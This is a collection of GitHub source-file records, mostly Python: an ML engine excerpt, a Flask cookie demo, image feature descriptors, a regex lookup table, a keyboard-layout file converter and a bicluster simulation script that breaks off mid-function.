self.unscale_grads(*optim_names)\n\n params = self._params_for_optimizers(optim_names) if optim_names \\\n else self.model.parameters()\n # Clip gradients by value\n clip_grad_value_(params, clip_value)\n\n def step(self, *optim_names: str):\n scaler = self._scaler\n optimizers = self._optimizers\n lr_scheds = self._lr_scheds\n unscaled_optims = self._unscaled_optims\n\n optim_names = optim_names or optimizers.keys()\n # Step given (or all) optimizers\n for optim_name in optim_names:\n optimizer = optimizers[optim_name]\n\n scaler.step(optimizer)\n # Step learning rate schedulers\n for lr_sched in lr_scheds[optim_name]:\n lr_sched.step()\n # Clear gradients\n optimizer.zero_grad()\n\n # Remove optimizer from unscaled optimizers\n if optim_name in unscaled_optims:\n unscaled_optims.remove(optim_name)\n \n # Update gradient scaler\n scaler.update()\n\n@dataclass\nclass Every:\n interval: int\n\n def __call__(self, engine: LocalEngine, *args: Any, event: Event, **kwargs: Any):\n return engine.ctx.count_for(event)%self.interval==0\n","repo_name":"lqf96/dltk","sub_path":"dltk/engine/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15180327087","text":"from flask import Flask, request, Response\nfrom datetime import datetime, timedelta\nfrom crmviews import bp\n\napp = Flask(__name__)\napp.register_blueprint(bp)\n# C:\\Windows\\System32\\drivers\\etc\\hosts\n# 在hosts���件中设置:127.0.0.1 chain.com\n# 在hosts文件中设置:127.0.0.1 crm.chain.com\n# 浏览器端访问:http://crm.chain.com:5000/\napp.config['SERVER_NAME'] = 'chain.com:5000'\n\n\n@app.route('/')\ndef hello_world():\n response = Response('设置cookie')\n\n # expires = datetime(year=2020, month=4, day=13, hour=16, minute=52, second=20)\n # response.set_cookie('username', 'chen', max_age=60) # max_age是表示cookie有效的时间,以秒为单位\n # expires设置的是到期的时间,是格林尼治时间\n # response.set_cookie('username', 'chen', expires=expires)\n\n expires = datetime.now() + timedelta(days=30, hours=16)\n response.set_cookie('username', 'chen', expires=expires, domain='.chain.com')\n return response\n\n@app.route('/del/')\ndef del_cookie():\n response = Response('删除cookie')\n response.delete_cookie('username')\n return response\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"chenyuchuting/Flask","sub_path":"6_WTForms_Cookie_Files_CRSF/5_cookie/1_test_cookie/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40164920651","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nlanguages = [\n('en', 'English'),\n('fr', 'French'),\n('de', 'German'),\n('es', 'Spanish'),\n('it', 'Italian'),\n('ja', 'Japanese'),\n('ru', 'Russian'),\n('la', 'Latin'),\n('ar', 'Arabic'),\n('cn', 'Chinese (with incorrect code)'),\n('pl', 'Polish'),\n('hi', 'Hindi'),\n('el', 'Greek'),\n('da', 'Danish'),\n('pt', 'Portuguese'),\n('he', 'Hebrew'),\n('vi', 'Vietnamese'),\n('zh', 'Chinese'),\n('yi', 'Yiddish'),\n('no', 'Norwegian'),\n('cs', 'Czech'),\n('sv', 'Swedish'),\n('hu', 'Hungarian'),\n('eo', 'Esperanto'),\n('fa', 'Persian'),\n('xh', 'Xhosa'),\n('zu', 'Zulu'),\n('ga', 'Irish'),\n('af', 'Afrikaans'),\n('ne', 'Nepali'),\n('ny', 'Chichewa'),\n('ta', 'Tamil'),\n('gd', 'Scottish Gaelic'),\n('tr', 'Turkish'),\n('ur', 'Urdu'),\n('th', 'Thai'),\n('st', 'Southern Sotho')\n]\n\ngc = frozenset(list('abcdefghjiklmnopqrstuvwxyz'))\n\ndef fix(s):\n r = []\n b = True\n for c in s:\n if c.lower() in gc:\n if b:\n r.append(c.upper())\n b = False\n else:\n r.append(c)\n else:\n b = True\n return ''.join(r)\n\nfor code, language in languages:\n cn = fix(language)\n fn = 'IsLanguage%s.py' % cn\n f = open(fn, 'wt')\n f.write(\"\"\"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom Feature import Feature\n\nclass IsLanguage%s(Feature):\n description = \\\"\\\"\\\"\nRegional: Spoken languages: is there %s?\n\\\"\\\"\\\".strip()\n\n def __init__(self, *args, **kwargs):\n Feature.__init__(self)\n \n def extract(self, m):\n for sl in m.spoken_languages:\n if sl['iso_639_1'] == '%s':\n return True\n return False\n\"\"\" % (cn, language, code))\n f.close()\n","repo_name":"unoduetre/MovieRecommendator","sub_path":"featuremaker/plugins/generators/spoken-language.py","file_name":"spoken-language.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36765121118","text":"from matplotlib import pyplot as plt\nfrom scipy import misc\nimport numpy as np\nimport cv2\nimport gist #https://github.com/yuichiroTCY/lear-gist-python\nfrom skimage import feature\n#from sklearn.preprocessing import normalize\nfrom six.moves import cPickle as pickle\n\ndef load_data():\n\tpickle_file = '/mnt/B8308B68308B2D06/CF/pickle_file_data2'\n\twith open(pickle_file, 'rb') as f:\n\t\tsave = pickle.load(f)\n\t\ttrain_dataset = save['train_dataset']\n\t\ttrain_labels = save['train_labels']\n\t\ttest_dataset = save['test_dataset']\n\t\ttest_labels = save['test_labels']\n\t\tdel save\t# hint to help gc free up memory\n\t\tprint('Training set', train_dataset.shape, len(train_labels))\n\t\tprint('Test set', test_dataset.shape, len(test_labels))\t\n\treturn train_dataset.astype(np.uint8),train_labels\n\n#3 histogram one for each color\ndef color_hist(img, histSize=256):\n\thist = []\n\thist[0] = cv2.calcHist([img],[0],None,[histSize],[0,256])\n\thist[1] = cv2.calcHist([img],[1],None,[histSize],[0,256])\n\thist[2] = cv2.calcHist([img],[2],None,[histSize],[0,256])\n\t#plt.plot(hist)\n\t#plt.xlim([0,256])\n\t#plt.show()\n\treturn hist\n\n#gist descriptor of size 960\ndef gist_descriptor(img):\n\treturn gist.extract(img)\n\n#sift descriptor of size number of (keypoint x 128)\ndef sift(img):\n\t#plt.imshow(img)\n\t#plt.show()\n\tgray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\tsift = cv2.xfeatures2d.SIFT_create()\n\t(kp, desc) = sift.detectAndCompute(gray, None)\n\t# print(desc.shape)\n\t# print(len(kp))\n\t# im=cv2.drawKeypoints(gray,kp,None,flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\t# plt.imshow(im)\n\t# plt.show()\n\treturn kp, desc\n\n#surf descriptor of size number of (keypoint x 128)\nSURF_threashold = 500\ndef surf(img):\n\tsurf = cv2.xfeatures2d.SURF_create(SURF_threashold)\n\tsurf.setExtended(True)\n\tkp, desc = surf.detectAndCompute(img,None)\n\t# print(desc.shape)\n\t# print(len(kp))\n\t# im=cv2.drawKeypoints(img,kp,None,(255,0,0),4)\n\t# plt.imshow(im)\n\t# plt.show()\n\treturn kp, desc\n\ndef save_vocabulary(BOWdict,name):\n\tf = open(name, 'wb')\n\tsave = {\n\t\tname: BOWdict.getVocabulary()\n\t}\n\tpickle.dump(save, f, pickle.HIGHEST_PROTOCOL)\n\tf.close()\n\n#######################Bag of words for SIFT#########################################\n#for reference https://github.com/briansrls/SIFTBOW/blob/master/SIFTBOW.py\ndef bag_of_words_sift(data, dictionarySize=10):\n\tBOW = cv2.BOWKMeansTrainer(dictionarySize)\n\tfor i in range(len(data)):\n\t\ttry:\n\t\t\tkp, dsc = sift(data[i])\n\t\t\tBOW.add(dsc)\n\t\texcept Exception: \n\t\t\tprint(i)\n\t\n\tprint(\"Clustering\")\n\tdictionary = BOW.cluster()\n\tprint(\"Finish\")\n\n\tsift2 = cv2.xfeatures2d.SIFT_create()\n\tbowDiction = cv2.BOWImgDescriptorExtractor(sift2, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(dictionary)\n\tsave_vocabulary(bowDiction,\"Sift_Voc\")\n\treturn bowDiction\n\ndef bow_feature_extract_sift(bowDiction, img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n kp,desc = sift(img)\n return bowDiction.compute(gray, kp, desc)\n\ndef load_sift_bow_diction(file):\n\twith open(file, 'rb') as f:\n\t\tsave = pickle.load(f)\n\t\tvocabulary = save['Sift_Voc']\n\t\tdel save\t# hint to help gc free up memory\n\tsift2 = cv2.xfeatures2d.SIFT_create()\n\tbowDiction = cv2.BOWImgDescriptorExtractor(sift2, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(vocabulary)\n\treturn bowDiction\n\n#######################Bag of words for SURF#########################################\ndef bag_of_words_surf(data, dictionarySize=10):\n\tBOW = cv2.BOWKMeansTrainer(dictionarySize)\n\tx=0\n\tfor i in range(len(data)):\n\t\ttry:\n\t\t\tkp, dsc = surf(data[i])\n\t\t\tBOW.add(dsc)\n\t\texcept Exception: \n\t\t\tprint(i)\n\t\t\tx+=1\n\tprint(\"--------------------------------->\",x)\n\tprint(\"Clustering\")\n\tdictionary = BOW.cluster()\n\tprint(\"Finish\")\n\n\tsurf2 = cv2.xfeatures2d.SURF_create(SURF_threashold)\n\tsurf2.setExtended(True)\n\tbowDiction = cv2.BOWImgDescriptorExtractor(surf2, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(dictionary)\n\tsave_vocabulary(bowDiction,\"Surf_Voc\")\n\treturn bowDiction\n\ndef bow_feature_extract_surf(bowDiction, img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n kp,desc = surf(img)\n return bowDiction.compute(gray, kp, desc)\n\ndef load_surf_bow_diction(file):\n\twith open(file, 'rb') as f:\n\t\tsave = pickle.load(f)\n\t\tvocabulary = save[file]\n\t\tdel save\t# hint to help gc free up memory\n\tsurf = cv2.xfeatures2d.SURF_create(SURF_threashold)\n\tsurf.setExtended(True)\n\tbowDiction = cv2.BOWImgDescriptorExtractor(surf, cv2.BFMatcher(cv2.NORM_L2))\n\tbowDiction.setVocabulary(vocabulary)\n\treturn bowDiction\n########################################################################################\n\ndef build_gabor_filter():\n\tfilters = []\n\tksize = 31\n\tfor theta in np.arange(0, np.pi, np.pi / 16):\n\t\tkern = cv2.getGaborKernel((ksize, ksize), 4.0, theta, 10.0, 1.0, 0, ktype=cv2.CV_32F)\n\t\tkern /= 1.5*kern.sum()\n\t\tfilters.append(kern)\n\treturn filters\n\ndef gabor(img):\n\tfilters = build_gabor_filter()\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\taccum = np.zeros_like(gray)\n\tfor kern in filters:\n\t\tfimg = cv2.filter2D(gray, cv2.CV_8UC3, kern)\n\t\tnp.maximum(accum, fimg, accum)\n\t# (hist, _) = np.histogram(accum.ravel(),\n\t# \tbins=np.arange(0, 57 + 3),\n\t# \trange=(0, 57 + 2))\n \n\t# # normalize the histogram\n\t# hist = hist.astype(\"float\")\n\t# hist /= (hist.sum() + 1e-7)\n\treturn accum - gray\n\t# return hist \n\n\ndef local_binary_pattern(img):\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tnumPoints = 57\n\tradius = 8\n\teps=1e-7\n\t# of the image, and then use the LBP representation\n\t# to build the histogram of patterns\n\tlbp = feature.local_binary_pattern(gray, numPoints,\n\t\tradius, method=\"uniform\")\n\t# (hist, _) = np.histogram(lbp.ravel(),\n\t# \tbins=np.arange(0, numPoints + 3),\n\t# \trange=(0, numPoints + 2))\n \n\t# # normalize the histogram\n\t# hist = hist.astype(\"float\")\n\t# hist /= (hist.sum() + eps)\n \n\t# return the histogram of Local Binary Patterns\n\treturn lbp\n\n#displays currently edges image only, can't determine the edge direction histogram\ndef edge_direction_histogram(img):\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tedges = cv2.Canny(gray,100,200)\n\tprint(edges.shape)\n\tplt.subplot(121),plt.imshow(img,cmap = 'gray')\n\tplt.title('Original Image'), plt.xticks([]), plt.yticks([])\n\tplt.subplot(122),plt.imshow(edges,cmap = 'gray')\n\tplt.title('Edge Image'), plt.xticks([]), plt.yticks([])\n\tplt.show()\n\n##################################salah test###############################\n# img = misc.imread('6.jpg')\n# d=sift(img)\n# print(img.shape)\n\n# #gabor test src=https://cvtuts.wordpress.com/2014/04/27/gabor-filters-a-practical-overview/\n# filters = build_gabor_filter()\n# res1 = gabor(img, filters)\n# print(res1.shape)\n# cv2.imshow('result', res1)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\n#local_binary_pattern src=http://www.pyimagesearch.com/2015/12/07/local-binary-patterns-with-python-opencv/\n# res2 = local_binary_pattern(img)\n\n# #edge direction histogram\n# edge_direction_histogram(img)\n############################################################################\n\n\n# data, label = load_data()\n# data, label = data[:10000], label[:10000]\n\n# BOWdict = bag_of_words_sift(data)\n# BOWdict = load_sift_bow_diction(\"Surf_Voc\")\n\n\n# for i in range(10):\n# \td = bow_feature_extract_sift(BOWdict,data[i])\n# \tprint(d.shape,label[i])\n# \tprint(d)\n# \tprint(\"__________________________________________________________\")\n\n\n\n\n# print(\"Done\")\n","repo_name":"alfredsamy/Multimodal-Deep-Similarity-Learning","sub_path":"descriptor.py","file_name":"descriptor.py","file_ext":"py","file_size_in_byte":7274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8602036992","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom collections import defaultdict\n\n\nclass RegexTable(object):\n\n def __init__(self, l_tpl, l_regex):\n assert len(l_tpl) == len(l_regex)\n self._table = self._make_table(l_tpl, l_regex)\n\n def _make_table(self, l_tpl, l_regex):\n return [(tplid, reobj) for tplid, reobj in enumerate(l_regex)]\n\n def search(self, mes):\n for tplid, reobj in self._table:\n matchobj = reobj.match(mes)\n if matchobj:\n return tplid, matchobj\n else:\n return None\n\n def shuffle(self):\n import random\n random.shuffle(self._table)\n\n\nclass RegexHashTable(RegexTable):\n\n def __init__(self, l_tpl, l_regex, headlen=5):\n assert isinstance(headlen, int)\n assert headlen > 0\n self._headlen = headlen\n self._table = None\n super().__init__(l_tpl, l_regex)\n\n def _make_table(self, l_tpl, l_regex):\n table = defaultdict(list)\n for tplid, (tpl, reobj) in enumerate(zip(l_tpl, l_regex)):\n if self._head_isstable(tpl, self._headlen):\n key = tpl[:self._headlen]\n else:\n key = \"\"\n table[key].append((tplid, reobj))\n return table\n\n @staticmethod\n def _head_isstable(tpl, headlen):\n from amulog import lt_common\n replacer = lt_common.REPLACER_REGEX\n matchobj = replacer.search(tpl)\n if matchobj:\n return matchobj.start() >= headlen\n else:\n return True\n\n def search(self, mes):\n key = mes[:self._headlen]\n if key not in self._table:\n key = \"\"\n\n for tplid, reobj in self._table[key]:\n matchobj = reobj.match(mes)\n if matchobj:\n return tplid, matchobj\n for tplid, reobj in self._table[\"\"]:\n matchobj = reobj.match(mes)\n if matchobj:\n return tplid, matchobj\n return None\n\n def shuffle(self):\n import random\n for key, subtable in self._table.items():\n random.shuffle(subtable)\n","repo_name":"amulog/amulog","sub_path":"amulog/external/regexhash.py","file_name":"regexhash.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"29"} +{"seq_id":"34433157256","text":"def solution(s):\n s = s.lower()\n L=s.split(\" \")\n answer = \"\"\n for i in L:\n i= i.capitalize()\n answer+= i+\" \"\n return answer[:-1]\n\n# 무슨 차이지? 21.9점\n# def solution(s):\n# answer = ''\n# s = s.lower()\n# arr = s.split()\n# for word in arr:\n# answer += word.capitalize() + \" \"\n# return answer[:-1]\n","repo_name":"Team-AiK/TT-Thinking-Training","sub_path":"Week19/groovypark/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"2379636430","text":"from keyboards import Keyboard, AnsiKeyboard, IsoKeyboard\nfrom keyboards import layout_symbols\nfrom static import locale_ids, SC, VK, sym_upper, static_text, SC_REVERSE\nfrom locale import windows_locale\nimport re\n\n\n# KC MEANS 'KEY CODE' just for yall's info\n\n\ndef _get_locale_id(language=\"english\", region=None):\n \"\"\"If the locale id exists, gives it back. If it doesn't, raises a KeyError\"\"\"\n if region:\n try:\n return locale_ids[f\"{language.lower()} - {region.lower()}\"]\n except KeyError:\n print(f\"{language} - {region} is not a valid identifier\")\n else:\n try:\n return locale_ids[language]\n except KeyError:\n print(f\"{language} unfortunately does not exist\")\n\n\ndef _make_rows_scs(keyboard, has_symbols: bool):\n \"\"\"Depending on the keyboard type, creates rows of scs and\n keys with or without custom numbers, an iso key or symbols\"\"\"\n if type(keyboard) == Keyboard:\n try:\n symbols = layout_symbols[keyboard.name]\n except KeyError:\n symbols = layout_symbols[\"dvorak\"]\n if has_symbols:\n rows = [\"1234567890\", keyboard.top_row, keyboard.homerow, keyboard.bot_row, symbols]\n scs = [SC[\"nums\"], SC[\"top_row\"], SC[\"homerow\"], SC[\"bot_row\"], SC[\"symbols\"]]\n return rows, scs\n else:\n rows = [\"1234567890\", keyboard.top_row, keyboard.homerow, keyboard.bot_row]\n scs = [SC[\"nums\"], SC[\"top_row\"], SC[\"homerow\"], SC[\"bot_row\"]]\n return rows, scs\n else:\n rows = [keyboard.nums, keyboard.top_row, keyboard.homerow, keyboard.bot_row,\n keyboard.symbols if keyboard.symbols != \"*******\" else layout_symbols[\"dvorak\"]]\n scs = [SC[\"nums\"], SC[\"top_row\"], SC[\"homerow\"], SC[\"bot_row\"], SC[\"symbols\"]]\n return rows, scs\n\n\ndef _get_kc_line(key: str, sc: str):\n \"\"\"create a line containing sc, vk and key information. The format is as follows:\n - - - - - .\n Note that the ctrl ascii code is set to be -1 (doesn't exist).\"\"\"\n no_cap = key != key.upper()\n hex_def = hex(ord(key))[2:]\n hex_upper = hex(ord(sym_upper[key]))[2:] if not no_cap else hex(ord(key.upper()))[2:]\n if sc != \"iso_key\":\n return f\"{sc}\\t{VK[key]}\\t{int(no_cap)}\\t00{hex_def}\\t00{hex_upper}\\t-1\"\n else:\n return f\"{SC[sc]}\\t{VK['iso_key']}\\t{int(no_cap)}\\t00{hex_def}\\t00{hex_upper}\\t-1\"\n\n\ndef keyboard_to_klc(keyboard, language=\"english\", region=None, has_symbols=True, directory=\"klc_files\"):\n \"\"\"Takes a Keyboard, AnsiKeyboard or IsoKeyboard object and generates a .klc file corresponding to its name.\n If no symbols, numbers or iso keys are present, uses dvorak symbols, 1234567890 numbers and \\\\\\\\ by default.\"\"\"\n assert type(keyboard) == Keyboard or type(keyboard) == AnsiKeyboard or type(keyboard) == IsoKeyboard,\\\n \"keyboard should be a Keyboard object\"\n locale_id = _get_locale_id(language, region)\n locale_name = windows_locale[int(locale_id, 16)]\n description = f\"keyboardD\\t{keyboard.name}\\t\\\"{keyboard.description}\\\"\\n\\nCOPYRIGHT\\t\\\"(c) 2021 OEM\\\"\\n\\nCOMPANY\\t\\\"OEM\\\"\\n\\n\"\\\n f\"LOCALENAME\\t\\\"{'-'.join(locale_name.split('_'))}\\\"\\n\\nLOCALEID\\t\\\"0000{locale_id}\\\"\\n\\nVERSION\\t\"\\\n f\"1.0\\n\\nSHIFTSTATE\\n\\n0\\t//Column 4\\n1\\t//Column 5 : Shft\\n2\\t//Column 6 : Ctrl\\n\\nLAYOUT\\t\\t\"\\\n f\";an extra \\'@\\' at the end is a dead key\\n\\n//SC\\tVK_\\t\\tCap\\t0\\t1\\t2\\n//--\\t----\\t\\t----\\t----\" \\\n f\"\\t----\\t----\\n\\n\"\n\n kc_lines = []\n for row, sc_row in zip(*_make_rows_scs(keyboard, has_symbols)):\n for key, sc in zip(row, sc_row):\n kc_lines.append(_get_kc_line(key, sc))\n\n if type(keyboard) == IsoKeyboard:\n kc_lines.append(_get_kc_line(keyboard.iso_key, sc=\"iso_key\"))\n\n kc_lines.append(\"39\\tSPACE\\t0\\t0020\\t0020\\t0020\")\n kc_lines.append(\"53\\tDECIMAL\\t0\\t002e\\t002e\\t-1\")\n key_lines = '\\n'.join(kc_lines)\n\n desc_2 = f\"DESCRIPTIONS\\n\\n{locale_id}\\t{region}-{keyboard.description}\" \\\n f\"\\nLANGUAGENAMES\\n\\n{locale_id}\\t{language}\\nENDKBD\\n\"\n with open(f\"{directory}/{keyboard.name}.klc\", \"w\", encoding='utf-16') as new_klc_file:\n new_klc_file.write(description + key_lines + static_text + desc_2)\n\n\ndef kc_to_char(kc: str):\n if len(kc) == 1:\n return kc\n else:\n return chr(int(kc[0:4], 16))\n\n\ndef klc_to_keyboard(file_name: str, keyboard_type=Keyboard, directory=\"klc_files\"):\n assert keyboard_type == Keyboard or keyboard_type == AnsiKeyboard or keyboard_type == IsoKeyboard,\\\n \"keyboard_type should be a Keyboard object\"\n with open(f\"{directory}/{file_name.split('.')[0]}.klc\", 'r', encoding='utf-16') as klc_file:\n klc = klc_file.read()\n kc_pattern = re.compile(r'(\\d.)\\t.+\\t\\d\\t(.{4,5}|.)\\t')\n keyboard_data = {\"nums\": ['*'] * 10,\n \"top_row\": ['*'] * 10,\n \"homerow\": ['*'] * 10,\n \"bot_row\": ['*'] * 10,\n \"symbols\": ['*'] * 7,\n \"iso_key\": '*'}\n for kc_data in re.findall(kc_pattern, klc):\n sc, key = kc_data\n try:\n row_destination, key_nr_destination = SC_REVERSE[sc]\n keyboard_data[row_destination][key_nr_destination] = kc_to_char(key)\n except ValueError:\n keyboard_data[\"iso_key\"] = kc_to_char(key)\n except KeyError:\n pass\n\n name, description = re.compile(r'KBD\\t(.+)\\t\"(.+)\"').findall(klc)[0]\n\n if keyboard_type == Keyboard:\n return Keyboard(keyboard_data['top_row'], keyboard_data['homerow'],\n keyboard_data['bot_row'], name, description)\n elif keyboard_type == AnsiKeyboard:\n return AnsiKeyboard(keyboard_data['top_row'], keyboard_data['homerow'], keyboard_data['bot_row'],\n name, description, keyboard_data['symbols'], keyboard_data['nums'])\n else:\n return IsoKeyboard(keyboard_data['top_row'], keyboard_data['homerow'], keyboard_data['bot_row'], name,\n description, keyboard_data['symbols'], keyboard_data['nums'], keyboard_data['iso_key'])\n","repo_name":"O-X-E-Y/create_layout_files","sub_path":"klc_ext.py","file_name":"klc_ext.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"28863592959","text":"# Write a function that takes two numbers as parameters\n# Return a list of n smallest odd integers greater than or equal to start, in ascending order.\n\ndef get_even_integers(start, n):\n count = 0\n even_integer_list = []\n\n while count <= n - 1:\n if start % 2 == 0: # check if start is an even number\n start += 2 # if it is add 2 to start and reassign value to start\n count += 1 # also increase the count by 1\n even_integer_list.append(start) # append start into the even_integer_list\n elif start % 2 != 0: # otherwise if start is an odd number\n start += 1 # add 1 to start and reassign value to start\n count += 1 # increase count by 1\n even_integer_list.append(start) # append start into the even_integer_list\n return even_integer_list # make sure to return\n\n\nprint(get_even_integers(2, 10))\n\n\n","repo_name":"k-charette/cloud-devops-2020","sub_path":"Week4/intro-to-python/functions/get_even_intergers.py","file_name":"get_even_intergers.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7372545430","text":"from __future__ import print_function\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport sys,os\nimport random\nimport copy\nimport time\nimport warnings\nfrom fisher import pvalue\n\n\nfrom desmond_io import print_network_stats\n\ndef make_bg_matrix(n_genes,n_pats):\n # generates empty matrix of (n_genes,n_pats)\n df = {}\n for g in range(0,n_genes):\n df[g] = np.random.normal(loc=0,scale=1.0,size = n_pats)\n df = pd.DataFrame.from_dict(df).T\n return df\n\n\ndef implant_biclusters(df,genes_per_bic=5,pats_per_bic=10,max_n_bics=1,bic_median=1.0,\n outdir = \"./\",filename=\"implanted_bic\", g_overlap=False,p_overlap=True):\n bic_g = []\n bic_p = []\n bg_g = set(df.index.values).difference(set(bic_g))\n bg_p = set(df.columns.values).difference(set(bic_p))\n if g_overlap == False:\n if p_overlap== False:\n n_bics = min(len(bg_g)/genes_per_bic,len(bg_p)/pats_per_bic,max_n_bics)\n fname_ext = \".overlap=FF\"\n bicluster_kind = \"with no overlap\"\n else:\n n_bics = min(len(bg_g)/genes_per_bic,max_n_bics)\n fname_ext = \".overlap=FT\"\n bicluster_kind = \"with sample overlap\"\n else:\n if p_overlap== False:\n n_bics = min(len(bg_p)/pats_per_bic,max_n_bics)\n fname_ext = \".overlap=TF\"\n bicluster_kind = \"with gene overlap\"\n else:\n n_bics =max_n_bics\n fname_ext = \".overlap=TT\"\n bicluster_kind = \"gene and sample overlap\"\n \n if n_bics != max_n_bics:\n print(\"Will create %s biclusters with %s instead of %s\"%(n_bics, bicluster_kind, max_n_bics),file=sys.stderr)\n else:\n print(\"Will create %s biclusters with %s \"%(n_bics,bicluster_kind),file=sys.stderr)\n \n biclusters = []\n\n # make samples annotation table\n anno = pd.DataFrame(index=map(lambda x : \"bic\"+str(x),range(0,n_bics)),\n columns=df.columns.values,data=0).T\n anno.index.name = \"samples2biclusters\"\n # make samples annotation table\n anno_g = pd.DataFrame(index=map(lambda x : \"bic\"+str(x),range(0,n_bics)),\n columns=df.index.values,data=0).T\n anno_g.index.name = \"genes2biclusters\"\n\n\n for bc in range(0,n_bics):\n # select random sets of samples and genes from the background\n genes = list(np.random.choice(list(bg_g),size=genes_per_bic,replace=False))\n pats = list(np.random.choice(list(bg_p),size=pats_per_bic,replace=False))\n biclusters.append({\"genes\":genes, \"samples\":pats})\n bic_g+=genes\n bic_p+=pats\n # identify samples outside the bicluster\n if not g_overlap:\n bg_g = bg_g.difference(set(bic_g))\n if not p_overlap:\n bg_p = bg_p.difference(set(bic_p))\n # generate bicluster\n df_bic = {}\n for g in genes:\n df_bic[g] = dict(zip(pats,np.random.normal(loc=bic_median,\n scale=1.0,size = pats_per_bic)))\n df_bic = pd.DataFrame.from_dict(df_bic).T \n\n #implant the bicluster\n df.loc[genes,pats] = df_bic\n df.index.name = \"genes_samples\"\n\n # add record to annotation\n anno.loc[pats,\"bic\"+str(bc)] = 1\n anno_g.loc[genes,\"bic\"+str(bc)] = 1\n if filename:\n filename = filename+\".N=\"+str(int(n_bics))+\".Mu=\"+str(bic_median)+\".GxP=\"+str(genes_per_bic)+\",\"+str(pats_per_bic)+fname_ext\n df.to_csv(outdir+\"/exprs/\"+filename+\".exprs.tsv\",sep = \"\\t\")\n # annotated df\n anno_g = anno_g.sort_values(by=list(anno_g.columns.values),ascending = False)\n anno = anno.sort_values(by=list(anno.columns.values),ascending = False)\n anno = anno.T\n df_anno = df.loc[anno_g.index.values, anno.columns.values]\n df_anno = pd.concat([anno_g,df_anno],axis =1)\n df_anno = pd.concat([anno,df_anno])\n df_anno = df_anno.loc[:,list(anno_g.columns.values)+list(anno.columns.values)]\n df_anno.to_csv(outdir+\"/exprs_annotated/\"+filename+\".exprs_annotated.tsv\",sep = \"\\t\")\n fopen = open(outdir+\"/true_biclusters/\"+filename+\".biclusters.txt\",\"w\")\n i=0\n for bic in biclusters:\n print(\"id:\\t\"+str(i),file=fopen)\n print(\"genes:\\t\"+\" \".join(map(str,bic[\"genes\"])),file=fopen)\n print(\"samples:\\t\"+\" \".join(map(str,bic[\"samples\"])),file=fopen)\n i+=1\n fopen.close()\n return df, biclusters,anno_g,filename\n\ndef simulate_network(n_genes, beta, delta,verbose = True):\n # makes scale-free networks\n t_0 = time.time()\n alpha = (1.0-beta)/2\n gamma = (1.0-beta)/2\n n_neigh =[]\n G = nx.scale_free_graph(n_genes,alpha=alpha,beta=beta,\n gamma=gamma,delta_in=delta, delta_out=delta)\n if verbose:\n print(\"\\tgamma:\",1+(1.0+delta*(alpha+gamma))/(alpha+beta))\n # convert to undirected, with no self-loops or duplicated edges\n G = G.to_undirected()\n G.remove_edges_from(G.selfloop_edges())\n G = nx.Graph(G)\n # node degree distribution\n for n in G.nodes():\n n_neigh.append(len(G[n].keys()))\n tmp = plt.hist(n_neigh,range=(1,100),bins=50, density=True)\n plt.show()\n if verbose:\n print_network_stats(G)\n print(\"\\tmin and max node degree: %s,%s\"%(max(n_neigh), min(n_neigh)))\n print(\"runtime:\",round(time.time()-t_0,2),\"s\",file = sys.stderr)\n return G\n\n\ndef group_genes(anno,verbose = True):\n # group genes together if they are asssigned to the same bicluster(s), e.g. all in 1 or all in 1,2,3 ... \n colnames = list(anno.columns.values)\n anno[\"sum\"] = anno.apply(sum,axis =1) # this is for sorting only\n anno.sort_values([\"sum\"]+colnames,ascending=False,inplace=True)\n anno = anno.loc[:,colnames]\n grouped = anno.groupby(colnames) # groupby by all columns\n max_bics_per_gene = 0\n gene_groups = []\n\n for name, group in grouped:\n #print(name,sum(name), len(group.index.values))\n max_bics_per_gene = max(max_bics_per_gene,sum(name))\n bics= []\n for i in range(0,len(name)):\n if name[i] == 1:\n bics.append(i)\n gene_groups.append({\"genes\":list(group.index.values),\"bics\":bics})\n if verbose:\n print(\"\\tMax. number of biclusters per gene:\",max_bics_per_gene)\n print(\"\\tUnique gene groups\",len(gene_groups))\n return gene_groups, max_bics_per_gene, anno \n\ndef find_starting_points(G,bics,m=1,verbose = True):\n ''' identifies bics already assigned to G \n \\n\\t m is multiplicator for selecting nodes with degree m times higher than the number of biclusters\n \\n returns 1) a list of starting nodes 2) whether these nodes unlabelled'''\n \n min_n_neigh = len(bics)\n consider_bics = set()\n for n,data in G.nodes(data=True):\n for bc in data['bics']:\n if bc in bics:\n consider_bics.add(bc)\n # identify seeds - nodes which neighbours already assigned to a bicluster\n if 